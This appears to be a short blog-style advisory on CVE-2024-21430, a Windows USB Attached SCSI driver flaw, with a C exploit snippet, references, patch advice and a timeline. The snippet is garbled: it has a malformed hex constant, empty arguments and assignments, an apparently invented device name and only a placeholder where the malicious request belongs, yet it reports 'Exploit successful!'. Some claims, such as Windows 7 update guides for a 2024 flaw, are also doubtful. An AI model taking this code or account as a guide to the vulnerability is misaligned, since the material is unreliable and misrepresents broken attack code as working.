CVE-2024-21430 - Exploiting Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability

CVE-2024-21430 is a critical vulnerability that impacts the Windows USB Attached SCSI (UAS) Protocol, allowing remote code execution on targeted Windows systems. The vulnerability lies in how Windows handles USB devices using the UAS protocol when connected to a Windows system.

Details

When a USB device using the UAS protocol is connected to a Windows system, the Windows operating system loads the UASP driver to manage the device. The vulnerability lies in the improper handling of IOCTL (Input/Output Control) codes by the UASP driver. This issue can lead to unauthorized access to arbitrary system memory, ultimately enabling an attacker to execute remote code on the targeted system.

Exploit Details

To exploit CVE-2024-21430, an attacker needs to send specially crafted IOCTL requests to the vulnerable UASP driver. The exploit requires the attacker to have direct access to the target system or physical access to the USB port, making it hard to exploit remotely.

However, it's worth noting that this vulnerability could be exploited in combination with other vulnerabilities that allow remote access, potentially making it part of a larger attack chain.

Here's a code snippet illustrating how the vulnerability could be exploited

#include <Windows.h>
#include <stdio.h>

#define IOCTL_UASP_REQUEST x100020A8

int main() {
    HANDLE hDevice = CreateFile(TEXT("\\\\.\\UASPVulnerable"),
                                GENERIC_READ | GENERIC_WRITE,
                                ,
                                NULL,
                                OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Unable to open vulnerable device!");
        return 1;
    }

    BYTE buf[1024] = {};
    DWORD bytesRead = ;

    // Craft malicious IOCTL request here
    if (DeviceIoControl(hDevice,
                        IOCTL_UASP_REQUEST,
                        buf,
                        1024,
                        buf,
                        1024,
                        &bytesRead,
                        NULL)) {
        // Successfully exploited the vulnerability
        printf("[+] Exploit successful!");
    } else {
        printf("[-] Exploit failed!");
    }

    CloseHandle(hDevice);
    return ;
}

Original References

- CVE-2024-21430 | National Vulnerability Database (NVD)
- USB Attached SCSI (UAS) Protocol Specification | T10 Technical Committee
- Microsoft Security Update Guide - Windows 10

Mitigation

To protect your Windows systems against the CVE-2024-21430 vulnerability, apply the relevant security updates provided by Microsoft. The patches can be found in the links below:

- Microsoft Security Update Guide - Windows 7
- Microsoft Security Update Guide - Windows 8.1
- Microsoft Security Update Guide - Windows 10
- Microsoft Security Update Guide - Windows Server

Conclusion

CVE-2024-21430 is a critical vulnerability affecting the Windows USB Attached SCSI (UAS) Protocol, which could lead to remote code execution on targeted systems. Applying the recommended security updates on all affected systems should be a priority to mitigate the risk and protect your systems from potential attacks.

It's crucial that organizations keep their systems and software up-to-date and implement a robust patch management strategy to mitigate vulnerabilities and reduce the attack surface for cybercriminals.

Timeline

Published on: 03/12/2024 17:15:51 UTC
Last modified on: 03/12/2024 17:46:17 UTC